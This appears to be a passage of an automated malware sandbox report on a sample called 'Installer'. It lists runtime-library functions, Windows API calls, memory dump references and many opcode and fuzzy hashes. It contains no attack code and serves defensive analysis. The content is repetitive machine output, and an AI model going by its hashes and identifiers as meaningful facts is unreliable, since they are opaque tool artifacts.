                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 00347395
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 003473A3
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 003473B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2261580123-0
                                                                                                                                                                                                                                                    • Opcode ID: 0a0724cb2bcc2cb005b20a0bc0532c92612577da9d573906679323a01a4e99cf
                                                                                                                                                                                                                                                    • Instruction ID: 17b88929fa81679bba1cb67cd21e432eff9166c0050404f0a018cc46265c00cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a0724cb2bcc2cb005b20a0bc0532c92612577da9d573906679323a01a4e99cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4941D2B59047058BDB22EF64C941BAAB7E8FF44320F158639E8165F691EB34F814CBE1
                                                                                                                                                                                                                                                    Function 00344460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00344495
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 003444B2
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 003444D3
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00344580
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    • Opcode ID: 6367108485c3dc81bd2310fd47694b719e174e87bc9f12660203b87da18a968c
                                                                                                                                                                                                                                                    • Instruction ID: 368d973501749918024692db23e5f4060138b3bb412c735fd32ff84e6c6b3001
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6367108485c3dc81bd2310fd47694b719e174e87bc9f12660203b87da18a968c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0416871D006188FCF26DF98D884BADBBF4FB49320F054269E8196B391DB34A984CF91
                                                                                                                                                                                                                                                    Function 00361DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00361E2A
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00361E31
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00361E6B
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00361E72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                                                                                                    • Opcode ID: ce684bc72ebb304fb26ba5765474dfb17e334713aced38d55cc750e42b650e68
                                                                                                                                                                                                                                                    • Instruction ID: 8bc2f35ff8a21187aeb032a5b14694d32dc86620d7e99aba21bb7ce4c20332d3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce684bc72ebb304fb26ba5765474dfb17e334713aced38d55cc750e42b650e68
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5421F231600605AFDB23AF65D881C3BB7ACFF04365B19C518FC199B111D732EC008BA0
                                                                                                                                                                                                                                                    Function 00352BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 07f222de374cc442ee781565bdd4b8c8d9b13cea11c8fcad1fd30304ebdcffa6
                                                                                                                                                                                                                                                    • Instruction ID: 23f9d25a1c83684b93f08ca119a268316203ad9f59aafdab98bf130b82a09aec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07f222de374cc442ee781565bdd4b8c8d9b13cea11c8fcad1fd30304ebdcffa6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3219F71204605AF9B23AF69DC81D6B77ACFF42366B114515FC559B272EB30EC4887A0
                                                                                                                                                                                                                                                    Function 003631BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 003631C6
                                                                                                                                                                                                                                                      • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003631FE
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036321E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                                                                                                    • Opcode ID: 7d64e2f76a28920d1a836205cdc276df5c95e8d1c9466a43e4e18937aaaef297
                                                                                                                                                                                                                                                    • Instruction ID: 072fb815d42100d20cf2fd9bf15f58411994e76d108df96f26c62e3d25d94826
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d64e2f76a28920d1a836205cdc276df5c95e8d1c9466a43e4e18937aaaef297
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 951122B150061A7EE72327B1EC9ACBFBA5CDE843A57114828FA05DA101FF60DF0481B0
                                                                                                                                                                                                                                                    Function 0034E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0034E899
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0034E8A3
                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 0034E8BA
                                                                                                                                                                                                                                                      • Part of subcall function 0034C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0034C1F6
                                                                                                                                                                                                                                                      • Part of subcall function 0034C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0034C210
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0034E914
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1383202999-0
                                                                                                                                                                                                                                                    • Opcode ID: 5533519127dc2bf48ce8709f26e255506314c73d5bd072606defbc22f5b16ce2
                                                                                                                                                                                                                                                    • Instruction ID: 707bf230c73dbc605cbf6ad098ca5aea5a6bf16c5e4d068d79ad36078ed7420b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5533519127dc2bf48ce8709f26e255506314c73d5bd072606defbc22f5b16ce2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211CE368002199BCB07EBA4C945AADBBE5BF84720F254108E415AF282CF74BA40CB81
                                                                                                                                                                                                                                                    Function 0036ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000), ref: 0036ADB7
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?,?,?,00363CD6,00000000), ref: 0036ADC3
                                                                                                                                                                                                                                                      • Part of subcall function 0036AE20: CloseHandle.KERNEL32(FFFFFFFE,0036ADD3,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?,?), ref: 0036AE30
                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 0036ADD3
                                                                                                                                                                                                                                                      • Part of subcall function 0036ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0036AD91,0036A2DC,?,?,00364390,?,00000000,00000000,?), ref: 0036AE08
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?), ref: 0036ADE8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                    • Opcode ID: 67e58375ea87ec9d6a1b856cbfe6b341d7bf536f0b3f4bd010d1d99a6644f5bd
                                                                                                                                                                                                                                                    • Instruction ID: 9109f6c398f9937bbdc916606d65ec4a747ac4cdccb0c86be9f68c66c1adea69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67e58375ea87ec9d6a1b856cbfe6b341d7bf536f0b3f4bd010d1d99a6644f5bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78F01C36510519BBCF331FD5DC29A9A3F2AFF087A1F018011FA0CA6521DB328CA0AF91
                                                                                                                                                                                                                                                    Function 003504F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00350507
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00350516
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0035051F
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0035052C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                    • Opcode ID: 3739b4fd72965dfd99f0d456f10d44e9517a5158b9999bca39628581159b863b
                                                                                                                                                                                                                                                    • Instruction ID: 9fb4e24d89b50e4c71a22ad4bef1a8743c99a75cd5a61e0592cc5a6efbf2cd4f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3739b4fd72965dfd99f0d456f10d44e9517a5158b9999bca39628581159b863b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F05F74D1060DEBCB11DBB4DA5999EBBF8FF1C300F914995A416E6110EA30AA849F50
                                                                                                                                                                                                                                                    Function 0035B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0035B893,?,?,00000000,00000000,00000000,?), ref: 0035B9B7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 300bda08f8dab3499a93a391b771091bf9b658931e0c00da274dd551b825a908
                                                                                                                                                                                                                                                    • Instruction ID: b5af09d52566c6b8535ea93e5b8d7e0310d59ab860fdef90cee510f8ff9d0ecf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 300bda08f8dab3499a93a391b771091bf9b658931e0c00da274dd551b825a908
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88415931900249EFCF16DF94CC81EAEBBB5BF48301F198159FD14AB221D3359954DB91
                                                                                                                                                                                                                                                    Function 0035B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0035B475
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                    • Opcode ID: 24f9bf80e67f899bdd3fe89874e0514ca63e5e081952399bf73781b5ba30c68c
                                                                                                                                                                                                                                                    • Instruction ID: bd95583374b4524900fbd54f8e52f8a5132a8e9b86138774bdf70f5e8668abf4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24f9bf80e67f899bdd3fe89874e0514ca63e5e081952399bf73781b5ba30c68c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B31B4B1400219EBCF2B9F51C840CAAFB66FF0A316B194A5AFD4449132D332DD69DBC1
                                                                                                                                                                                                                                                    Function 0034B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034B8B9
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?,?), ref: 0034B8DE
                                                                                                                                                                                                                                                      • Part of subcall function 0035060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0034F354,03383FB8,?,?,?,0034F354,00343D4A,0037759C,00343D4A), ref: 0035066D
                                                                                                                                                                                                                                                      • Part of subcall function 00358353: IsProcessorFeaturePresent.KERNEL32(00000017,0035C224), ref: 0035836F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 1efde886dd8fe6b0c50067b2894e63f5b14044107227fde69f2e4f2a3e44db4a
                                                                                                                                                                                                                                                    • Instruction ID: 6fd867c1edb22f4dfcf11d0c4d9ec3cabdf6f637751b9cb28c5d870b53d0067e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1efde886dd8fe6b0c50067b2894e63f5b14044107227fde69f2e4f2a3e44db4a
